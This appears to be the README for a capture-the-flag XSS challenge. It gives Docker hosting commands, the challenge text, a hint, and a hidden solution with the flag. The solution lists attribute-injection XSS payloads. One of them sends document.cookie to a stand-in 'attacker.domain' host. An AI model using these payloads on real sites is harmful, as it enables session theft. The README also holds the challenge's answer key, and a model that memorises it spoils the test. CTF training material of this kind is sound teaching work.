# Web Medium/Hard - XSS
## XSS
XSS challenge.

## Author(s)
- RPScylla

## ToDo:
- Make better webpage
- Include better flag

## How to build/host
- Docker image
- Text instructions on CTFd
- Hint on CTFd

### Docker compile commands
```
sudo docker build --rm -t xss .
sudo docker run --rm -d -p 8080:8080 --name xss xss
```

### Text instructions
> We of the pentesthub love to see your most epic images from the CTF!
> Therefor we made a website where you can upload a url and we take a look at the image.

### Hint
> You are not restricted to a url. 

## Solution
<details>
<summary>Click to show</summary>

`fake.png" onerror="alert(1)`

`fake.png" onerror="alert(document.cookie)`

`fake.png' onerror='(function(e){var img = document.createElement ("img");img.src = "https://attacker.domain/log?" + escape(document.cookie);document.body.appendChild(img);})(this)`

</details>

### Flag
PTH{xss_protect_my_cookies!}